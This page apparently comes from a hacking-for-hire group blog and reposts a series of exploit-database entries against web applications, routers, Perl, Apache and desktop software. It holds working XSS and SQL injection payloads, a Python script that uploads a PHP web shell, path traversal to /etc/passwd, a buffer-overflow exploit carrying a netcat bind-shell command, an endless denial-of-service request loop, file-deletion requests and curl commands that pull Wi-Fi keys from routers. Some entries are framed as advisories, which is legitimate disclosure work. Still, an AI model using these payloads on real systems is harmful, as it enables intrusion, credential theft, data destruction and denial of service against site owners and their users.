Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863113814

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/47755/info

encoder is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

encoder 0.4.10 is vulnerable; other versions may also be affected. 

http://www.example.com/ecoder-0.4.10/edit.php?editor=&mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&path=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&file=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/47758/info

Gelsheet is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Gelsheet 1.02 is vulnerable; other versions may also be affected. 

http://www.example.com/fengoffice/public/assets/javascript/gelSheet/index.php?id=%3Cscript%3Ealert%280%29%3C/script%3E&wid=%3Cscript%3Ealert%280%29%3C/script%3E&book=%3Cscript%3Ealert%280%29%3C/script%3E
HireHackking 
# Exploit Title: SQL Injection in Microweber CMS 0.95
# Google Dork: N/A
# Date: 12/16/2014
# Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) and ITAS Team (www.itas.vn)
# Vendor Homepage: Microweber (https://microweber.com/)
# Software Link: https://github.com/microweber/microweber
# Version: 0.95
# Tested on: N/A
# CVE : CVE-2014-9464

::PROOF OF CONCEPT::

GET /shop/category:[SQL INJECTION HERE] HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/shop
Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275
Connection: keep-alive

::REFERENCE::
- http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-microweber-cms-69.html
- https://www.youtube.com/watch?v=SSE8Xj_-QaQ
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9464

::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
HireHackking 
source: https://www.securityfocus.com/bid/47759/info

phpWebSite is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

phpWebSite 1.7.1 is vulnerable; other versions may also be affected. 

# ------------------------------------------------------------------------
# Software................phpWebSite 1.7.1
# Vulnerability...........Arbitrary Upload
# Threat Level............Very Critical (5/5)
# Download................http://phpwebsite.appstate.edu/
# Discovery Date..........5/5/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
# 
# 
# --Description--
# 
# An arbitrary upload vulnerability in phpWebSite 1.7.1 can be exploited
# to upload a PHP shell.
# 
# 
# --PoC--

import socket

host = 'localhost'
path = '/phpwebsite_1_7_1'
shell_path = path + '/javascript/editors/fckeditor/editor/filemanager/upload/phpws/.shell'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)    

    s.send('POST ' + path + '/javascript/editors/fckeditor/editor/filemanager/upload/phpws/upload.php?local=.htaccess HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 223\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="NewFile"; filename=".htaccess"\r\n'     
           'Content-Type: application/octet-stream\r\n'
           '\r\n'
           'AddType application/x-httpd-php .shell\r\n'
           '\r\n'
           'Action application/x-httpd-php "/php/php.exe"\r\n'
           '------x--\r\n'
           '\r\n')

    resp = s.recv(8192)

    http_ok = 'HTTP/1.1 200 OK'
    
    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading .htaccess'
        return
    else: print '.htaccess uploaded'
 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)    

    s.send('POST ' + path + '/javascript/editors/fckeditor/editor/filemanager/upload/phpws/upload.php?local=.htaccess HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 163\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="NewFile"; filename=".shell"\r\n'
           'Content-Type: application/octet-stream\r\n'
           '\r\n'
           '<?php system($_GET["CMD"]); ?>\r\n'
           '------x--\r\n'
           '\r\n')

    resp = s.recv(8192)

    http_ok = 'HTTP/1.1 200 OK'
    
    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded' 
 

    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
           'Host: ' + host + '\r\n\r\n')

    
    print 'shell located at http://' + host + shell_path

upload_shell()
HireHackking

Sefrengo CMS 1.6.0 - SQL Injection

HACKER · %s · %s

Advisory: SQL-Injection in administrative Backend of Sefrengo CMS v.1.6.0 Advisory ID: SROEADV-2015-04 Author: Steffen Rösemann Affected Software: CMS Sefrengo v.1.6.0 (Release-Date: 18th-Feb-2014) Vendor URL: http://www.sefrengo.org/start/start.html Vendor Status: fixed CVE-ID: - ========================== Vulnerability Description: ========================== The Content Management System Sefrengo v.1.6.0 contains SQL-Injection vulnerabilities in its administrative Backend. ================== Technical Details: ================== The administrative Backend of Sefrengo CMS contains a functionality to edit folders which reside on the CMS. Its located here: http://{TARGET}/backend/main.php?area=con_configcat&idcat=1&idtplconf=0 The parameter „idcat“ ist vulnerable against SQL-Injection. An attacker could abuse this to send crafted URLs to the administrator via mail to execute own SQL commands (e.g. create a second admin-account). Exploit-Example: http:// {TARGET}/backend/main.php?area=con_configcat&idcat=1'+and+'1'='2'+union+select+version(),user(),3,4+--+&idtplconf=0 Another SQL-Injection vulnerability can be found in the administrative backend, where the admin can manage installed plugins. The vulnerable parameter is „idclient“ in the following URL: http://{TARGET}/backend/main.php?area=plug&idclient=1 Exploit-Example: http:// {TARGET}/backend/main.php?area=plug&idclient=1%27+and+%271%27=%272%27+union+select+1,version%28%29,user%28%29,4,database%28%29,6,7,8,9,10,11,12,13,14+--+ ========= Solution: ========= Update to the latest version ==================== Disclosure Timeline: ==================== 21-Dec-2014 –found the vulnerability 21-Dec-2014 - informed the developers 22-Dec-2014 - response by vendor 04-Jan-2015 – fix by vendor 04-Jan-2015 - release date of this security advisory 04-Jan-2015 - post on BugTraq / FullDisclosure ======== Credits: ======== Vulnerability found and advisory written by Steffen Rösemann. =========== References: =========== http://www.sefrengo.org/start/start.html http://sroesemann.blogspot.de
HireHackking
source: https://www.securityfocus.com/bid/47762/info TCExam is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. TCExam 11.1.029 is vulnerable; other versions may also be affected. http://www.example.com/tcexam/admin/code/tce_xml_user_results.php?lang=&user_id=1&startdate=[SQL]&enddate=[SQL]&order_field=[SQL]
HireHackking
source: https://www.securityfocus.com/bid/47766/info Perl is prone to multiple denial-of-service vulnerabilities caused by a NULL-pointer dereference. An attacker can exploit these issues to cause an affected application to crash, denying service to legitimate users. Perl versions 5.10.x are vulnerable. jonathan () blackbox:~/test$ cat poc1.pl #!/usr/bin/perl $a = getsockname(9505,4590,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAA",17792); jonathan () blackbox:~/test$ perl poc1.pl Segmentation fault (core dumped) jonathan () blackbox:~/test$
HireHackking

Getsimple CMS 3.0 - 'set' Local File Inclusion

HACKER · %s · %s

source: https://www.securityfocus.com/bid/47767/info GetSimple is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. GetSimple 3.0 is vulnerable; other versions may also be affected. # ------------------------------------------------------------------------ # Software................GetSimple 3.0 # Vulnerability...........Local File Inclusion # Threat Level............Critical (4/5) # Download................http://get-simple.info/ # Discovery Date..........5/4/2011 # Tested On...............Windows Vista + XAMPP # ------------------------------------------------------------------------ # Author..................AutoSec Tools # Site....................http://www.autosectools.com/ # Email...................John Leitch <john@autosectools.com> # ------------------------------------------------------------------------ # # # --Description-- # # A local file inclusion vulnerability in GetSimple 3.0 can be exploited # to include arbitrary files. # # # --PoC-- import socket host = 'localhost' path = '/getsimple_3.0' trav_sequence = '..%2f' * 8 + 'windows%2fwin.ini' port = 80 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.settimeout(8) s.send('POST ' + path + '/index.php?set=' + trav_sequence + ' HTTP/1.1\r\n' 'Host: localhost\r\n' 'Proxy-Connection: keep-alive\r\n' 'User-Agent: x\r\n' 'Content-Length: 0\r\n' 'Cache-Control: max-age=0\r\n' 'Origin: null\r\n' 'Content-Type: multipart/form-data; boundary=----x\r\n' 'Accept: text/html\r\n' 'Accept-Language: en-US,en;q=0.8\r\n' 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n' '\r\n') resp = s.recv(8192) print resp
HireHackking
<!-- # Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload # Date: 29-10-2014 # Software Link: https://wordpress.org/plugins/wp-easycart/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # CVE: CVE-2014-9308 # Category: webapps 1. Description Any registered user can upload any file because of incorrect if statement inside banneruploaderscript.php http://security.szurek.pl/wordpress-shopping-cart-304-unrestricted-file-upload.html 2. Proof of Concept Login as regular user (created using wp-login.php?action=register): --> <form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data"> <input type="hidden" name="datemd5" value="1"> <input type="file" name="Filedata"> <input value="Upload!" type="submit"> </form> <!-- File will be visible: http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension% 3. Solution: Update to version 3.0.9 https://downloads.wordpress.org/plugin/wp-easycart.3.0.9.zip -->
HireHackking

Ntpdc 4.2.6p3 - Local Buffer Overflow

HACKER · %s · %s

# Source: https://hatriot.github.io/blog/2015/01/06/ntpdc-exploit/ from os import system, environ from struct import pack import sys # # ntpdc 4.2.6p3 bof # @dronesec # tested on x86 Ubuntu 12.04.5 LTS # IMAGE_BASE = 0x80000000 LD_INITIAL_OFFSET = 8900 LD_TAIL_OFFSET = 1400 sploit = "\x41" * 485 # junk sploit += pack("<I", IMAGE_BASE + 0x000143e0) # eip sploit += "\x41" * 79 # junk sploit += pack("<I", IMAGE_BASE + 0x0002678d) # location -0x14/-0x318 from shellcode ld_pl = "" ld_pl += pack("<I", 0xeeffffff) # ESI ld_pl += pack("<I", 0x11366061) # EDI ld_pl += pack("<I", 0x41414141) # EBP ld_pl += pack("<I", IMAGE_BASE + 0x000138f2) # ADD EDI, ESI; RET ld_pl += pack("<I", IMAGE_BASE + 0x00022073) # CALL EDI ld_pl += pack("<I", 0xbffff60d) # payload addr based on empty env; probably wrong environ["EGG"] = "/bin/nc -lp 5544 -e /bin/sh" for idx in xrange(200): for inc in xrange(200): ld_pl = ld_pl + "\x41" * (LD_INITIAL_OFFSET + idx) ld_pl += "\x43" * (LD_INITIAL_OFFSET + inc) environ["LD_PRELOAD"] = ld_pl system("echo %s | ntpdc 2>&1" % sploit)
HireHackking
# Exploit Title: vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, SQL Injection & XSS # Date: January 8, 2015 # Exploit Author: Technidev (https://technidev.com) # Vendor Homepage: https://vbulletin.com # Software Link: http://www.vbulletin.org/forum/showthread.php?t=256723 # Version: 1.1.4 This plugin is fairly old but still used by a lot of people and received its last update nearly 4 years ago. It’s vulnerable to arbitrary file deletion and SQL injection. *Arbitrary File(s) Deletion* In /microcart/editor/assetmanager/ are a bunch of files which are probably used to manage files/folders for the administrator, unfortunately no authentication and checks were added to see if the user should have access to it and if the request doesn’t contain anything malicious. The /microcart/editor/assetmanager/folderdel_.php file contains the following on top: $sMsg = ""; if(isset($_POST["inpCurrFolder"])) { $sDestination = pathinfo($_POST["inpCurrFolder"]); //DELETE ALL FILES IF FOLDER NOT EMPTY $dir = $_POST["inpCurrFolder"]; $handle = opendir($dir); while($file = readdir($handle)) if($file != "." && $file != "..") unlink($dir . "/" . $file); closedir($handle); if(rmdir($_POST["inpCurrFolder"])==0) $sMsg = ""; else $sMsg = "<script>document.write(getTxt('Folder deleted.'))</script>"; } By simply sending a POST request to this file, we can delete every single file in specified folder. POST to: /microcart/editor/assetmanager/folderdel_.php POST data: inpCurrFolder: ../../../ This POST request will delete every single .php file in the root folder of vBulletin. *Arbitrary File Deletion* There’s another vulnerability which resides in the /microcart/editor/assetmanager/assetmanager.php file. It contains an upload function, which is safe, and a file deletion function, which is not safe. We can delete any file off the server by abusing this. So unlike the previous vulnerability I just wrote which deletes all files by sending a POST request with a folder value, this will only delete 1 file off the server. Vulnerable code: if(isset($_POST["inpFileToDelete"])) { $filename=pathinfo($_POST["inpFileToDelete"]); $filename=$filename['basename']; if($filename!="") unlink($currFolder . "/" . $filename); $sMsg = ""; } Exploited by sending the following request: POST to: /microcart/editor/assetmanager/assetmanager.php POST data: inpCurrFolder: ../../../ inpFileToDelete: index.php This will delete the /index.php file of vBulletin, in the root. *Aribtrary Folder Creation* Besides the file deletion, there’s a file called /microcart/editor/assetmanager/foldernew.php which created a 0755 chmodded folder on the server. The file contains the following on top: $sMsg = ""; if(isset($_POST["inpNewFolderName"])) { $sFolder = $_POST["inpCurrFolder"]."/".$_POST["inpNewFolderName"]; if(is_dir($sFolder)==1) {//folder already exist $sMsg = "<script>document.write(getTxt('Folder already exists.'))</script>"; } else { //if(mkdir($sFolder)) if(mkdir($sFolder,0755)) $sMsg = "<script>document.write(getTxt('Folder created.'))</script>"; else $sMsg = "<script>document.write(getTxt('Invalid input.'))</script>"; } } By sending the following POST request, we will create a folder with 0755 chmodded permission. POST to: /microcart/editor/assetmanager/foldernew.php POST data: inpNewFolderName: davewashere inpCurrFolder: ../../.. This POST request will create the folder davewashere in the root of the vBulletin forum. *SQL Injection* MicroCART is also vulnerable to SQL injection at several locations although most of them are rather hard to abuse. I will not explain how to exploit it, but the vulnerability can be found at /cart.php line 833 to 881 and the function where you can add products to your shopping cart, at around line 1251 to 1328 where $_POST[‘fields’] is assigned to the configuration variable which is later used in a query. *Cross Site Scripting* When modifying your information at /cart.php?do=cpanel, you can inject anything you want into the fields. Viewing reviews of products may be vulnerable as well when you leave out the wysiwyg POST key.
HireHackking
source: https://www.securityfocus.com/bid/47786/info poMMo is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. <form action="http://www.example.com/admin/setup/config/general.php" method="post" name="main"> <input type="hidden" name="list_name" value="Mailing List"> <input type="hidden" name="site_name" value='poMMo"><script>alert(document.cookie)</script>'> <input type="hidden" name="site_name" value="poMMo Website"> <input type="hidden" name="site_url" value="http://www.example.com/"> <input type="hidden" name="site_success" value=""> <input type="hidden" name="site_confirm" value=""> <input type="hidden" name="list_confirm" value="on"> <input type="hidden" name="list_exchanger" value="mail"> </form> <script> document.main.submit(); </script> 2. http://www.example.com/index.php?referer=1"><script>alert(document.cookie)</script> 3. <form action="http://www.example.com/admin/subscribers/subscribers_groups.php" method="post" name="main"> <input type="hidden" name="group_name value='group"><script>alert("XSS")</script>'> </form> <script> document.main.submit(); </script> 4. <form action="http://www.example.com/admin/setup/setup_fields.php" method="post" name="main"> <input type="hidden" name="field_name" value='1"><script>alert(document.cookie)</script>'> <input type="hidden" name="field_type" value="text"> </form> <script> document.main.submit(); </script>
HireHackking

Apache 1.4/2.2.x - APR 'apr_fnmatch()' Denial of Service

HACKER · %s · %s

source: https://www.securityfocus.com/bid/47820/info Apache APR is prone to a vulnerability that may allow attackers to cause a denial-of-service condition. Apache APR versions prior to 1.4.4 are vulnerable. <?php /* Apache 2.2.17 mod_autoindex local/remote Denial of Service author: Maksymilian Arciemowicz CVE: CVE-2011-0419 CWE: CWE-399 REMOTE Find some directory with supported mod_autoindex on the server. The directory should contain long filenames. http://[server]/[directory_with_mod_autoindex]/?P=*?*?*?[to 4k] LOCAL Tested on: 127# httpd -v && uname -a Server version: Apache/2.2.17 (Unix) Server built: Dec 28 2010 13:21:44 NetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov 7 14:39:56 UTC 2010 builds@b6.netbsd.org:/home/builds/ab/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/ab/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386 Result: 127# ls -la total 8 drwxrwxrwx 2 root wheel 512 Feb 8 21:41 . drwxr-xr-x 7 www wheel 1024 Jan 31 08:49 .. -rw-r--r-- 1 www wheel 1056 Feb 8 19:39 .htaccess -rw-r--r-- 1 www wheel 0 Feb 8 19:39 cx............................................................................................................................. -rw-r--r-- 1 www wheel 1240 Feb 8 19:42 run.php 127# ps -aux -p 617 USER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMAND www 617 98.6 0.4 10028 4004 ? R 7:38PM 121:43.17 /usr/pkg/sbin/httpd -k start Time = 121:43 and counting where http://[$localhost]:[$localport]/[$localuri] */ $localhost="localhost"; $localport=80; $localuri="/koniec/"; if(!is_writable(".")) die("!writable"); // Phase 1 // Create some filename touch("cx".str_repeat(".",125)); // Phase 2 // Create .htaccess with unlink("./.htaccess"); $htaccess=fopen("./.htaccess", "a"); fwrite($htaccess,"AddDescription \"CVE-2011-0419\" ".str_repeat('*.',512)."\n"); fclose($htaccess); // Phase 3 // Local connect (bypass firewall restriction) while(1){ $fp = fsockopen($localhost, $localport, $errno, $errstr, 30); if (!$fp) echo "$errstr ($errno)<br />\n"; else { $out = "GET ".$localuri."/?P=".str_repeat("*?",1500)."* HTTP/1.1\r\n"; $out .= "Host: ".$localhost."\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); fclose($fp); } } ?>
HireHackking

Palringo 2.8.1 - Local Stack Buffer Overflow

HACKER · %s · %s

#!/use/bin/perl # Exploit Title: ‫palringo stack buffer overflow # Date: 10 January 2015 # Vulnerability discovered by: Mr.ALmfL9 # Vendor Homepage: http://www.palringo.com/ # Software Link: http://www.palringo.com/ar/sa/download/?get=winpc # Version: 2.8.1 # Tested on: Windows 8.1 use IO::Socket; $port = 8080; my $payload = "\x41" x 144; $payload = $payload. "\x42" x 4 ; $payload = $payload. "\x42" x 9000; $serv = IO::Socket::INET->new(Proto=>'tcp', LocalPort=>$port, Listen=>1) or die "Error: listen($port)\n"; while($cli=$serv->accept()){ print "[#] port is: $port\n"; print $cli "HTTP/$payload\r\n\r\n"; while(<$cli>){ print $cli; } } #*REFERENCE* #.1=http://store2.up-00.com/2015-01/1420867197761.png #.2=http://store2.up-00.com/2015-01/1420867235381.png
HireHackking

Argyle Social - Multiple Cross-Site Scripting Vulnerabilities

HACKER · %s · %s

source: https://www.securityfocus.com/bid/47826/info Argyle Social is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 1. <form action="www.example.com/settings-ajax/stream_filter_rules/create" method="post" name="main"> <input type="hidden" name="stream_filter_rule" value=&#039;{"name":"rulename","id":"","flags":[ "flagged"],"networks":null,"user_id":"0","terms":"XSS\& quot;><script>alert(document.cookie)</script>"}&#039;> </form> <script> document.main.submit(); </script> 2. <form action="www.example.com/publish-ajax/efforts/create" method="post" name="main"> <input type="hidden" name="effort" value=&#039;{"effort_id":"","title":"ptitle2\">< font color="#0000FF"><script>alert(document.cookie)</script>","url":"http://www.google.com","short&q uot;:null,"campaigns":[],"primary_campaign":null,"flights":[{"glass_id" ;:"post0","flight_id":null,"mdk":false,"source":"web interface","content_type":"twitter-status","content":{"content":& quot;hello"},"stime":"4/30/2011 23:10:00","networks":[{"id":"1","name":"My Name","type":"twitter","url":"","avatar":"http://a 2.twimg.com/profile_images/1124040897/at-twitter_reasonably_small.png"}],"waparams":{"pnam e":null}}]}&#039;> </form> <script> document.main.submit(); </script>
HireHackking
- Title: CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure HomeStation Movistar - Author: Eduardo Novella @enovella_ ednolo[@]inf.upv[dot]es - Version: Tested on firmware version PDG_TEF_SP_4.06L.6 - Shodan dork : + "Dropbear 0.46 country:es" ( From now on it looks like not working on this way) - Summary: HomeStation movistar has deployed routers manufactured by Pirelli. These routers are vulnerable to fetch HTML code from any IP public over the world. Neither authentication nor any protection to avoid unauthorized extraction of sensitive information. - The vulnerability and the way to exploit it: $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_" <option value='0'>WLAN_DEAD</option> $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey" var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD'; $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin" var WscDevPin = '12820078'; $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey" var sessionKey='1189641421'; $ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3 <td width="50">BSSID:</td> <td> DC:0B:1A:XX:XX:XX </td> # Rebooting the router remotely and provoking a Denial of Service #----------------------------------------------------------------- http://${IP_ADDRESS}/resetrouter.html We can observe at the source: <!-- hide var sessionKey='846930886'; function btnReset() { var loc = 'rebootinfo.cgi?'; loc += 'sessionKey=' + sessionKey; var code = 'location="' + loc + '"'; eval(code); } // done hiding --> http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123 # All the information what we can fetch from. #---------------------------------------------- webs$ ls adslcfgadv.html diagpppoe.html ipv6lancfg.html qoscls.html statsatmreset.html adslcfgc.html dlnacfg.html js qosqmgmt.html statsifc.html adslcfg.html dnscfg.html jsps qosqueueadd.html statsifcreset.html adslcfgtone.html dnsproxycfg.html lancfg2.html qsmain.html statsmocalanreset.html algcfg.html dsladderr.html languages quicksetuperr.html statsmocareset.html APIS dslbondingcfg.html lockerror.html quicksetup.html statsmocawanreset.html atmdelerr.html enblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html backupsettings.html enblservice.html logintro.html quicksetuptestsucc.html statsvdslreset.html berrun.html engdebug.html logobkg.gif rebootinfo.html statswanreset.html berstart.html ethadderr.html logoc.gif resetrouter.html statsxtmreset.html berstop.html ethdelerr.html logo_corp.gif restoreinfo.html storageusraccadd.html certadd.html footer.html logo.html routeadd.html stylemain.css certcaimport.html hlpadslsync.html logomenu.gif rtdefaultcfgerr.html threeGPIN.html certimport.html hlpatmetoe.html main.html rtdefaultcfg.html todadd.html certloadsigned.html hlpatmseg.html menuBcm.js scdmz.html tr69cfg.html cfgatm.html hlpethconn.html menu.html scinflt.html updatesettings.html cfgeth.html hlppngdns.html menuTitle.js scmacflt.html upload.html cfgl2tpac.html hlppnggw.html menuTree.js scmacpolicy.html uploadinfo.html cfgmoca.html hlppppoasess.html mocacfg.html scoutflt.html upnpcfg.html cfgptm.html hlppppoeauth.html multicast.html scprttrg.html url_add.html colors.css hlppppoeconn.html natcfg2.html scripts util.js config.json.txt hlppppoeip.html ntwksum2.html scvrtsrv.html wanadderr.html css hlptstdns.html omcidownload.html seclogintro.html wancfg.html ddnsadd.html hlpusbconn.html omcisystem.html snmpconfig.html wlcfgadv.html defaultsettings.html hlpwlconn.html password.html sntpcfg.html wlcfg.html dhcpinfo.html html portmapadd.html standby.html wlcfgkey.html diag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html diagbr.html ifcgateway.html portName.js StaticIpErr.html wlrefresh.html diag.html images pppoe.html statsadslerr.html wlsecurity.html diagipow.html index.html pradd.html statsadsl.html wlsetup.html diaglan.html info.html ptmadderr.html statsadslreset.html wlwapias.html diagmer.html ipoacfg.html ptmdelerr.html statsatmerr.html xdslcfg.html diagpppoa.html ippcfg.html pwrmngt.html statsatm.html + Conclusion: This vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network or even worse being a member of a botnet without knowledge of it. First mitigation could be either try to update the last version for these routers or install 3rd parties firmwares as OpenWRT or DDWRT on them. + References: http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html + Timeline: 2013-04-xx Send email to Movistar and Pirelli 2015-01-05 Full disclosure
HireHackking

EmbryoCore 1.03 - 'index.php' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/47763/info EmbryoCore is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. EmbryoCore 1.03 is vulnerable; other versions may also be affected. http://www.example.com/[path]/index.php?page=[-!Blind SQLi Here!-]
HireHackking

HOMEPIMA Design - 'filedown.php' Local File Disclosure

HACKER · %s · %s

source: https://www.securityfocus.com/bid/47770/info HOMEPIMA Design is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input. Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. http://www.example.com/setup/filedown.php?file=../../../../../../../../../../../../../../etc/passwd
HireHackking
source: https://www.securityfocus.com/bid/47772/info Keyfax Customer Response Management is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Keyfax Customer Response Management 3.2.2.6 is vulnerable; other versions may also be affected. http://www.example.com/keyfax32/test/response.asp?co="style%3d"x:expression(alert(1))""%20"; http://www.example.com/keyfax32/rs/main_rs.asp?C="style%3d"x:expression(alert(1))""%20";
HireHackking

Imperva SecureSphere - SQL Query Filter Security Bypass

HACKER · %s · %s

source: https://www.securityfocus.com/bid/47780/info Imperva SecureSphere is prone to a security-bypass vulnerability. An attacker can leverage this vulnerability to bypass certain security restrictions. Successful exploits may allow attackers to exploit SQL-injection vulnerabilities. 15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
HireHackking
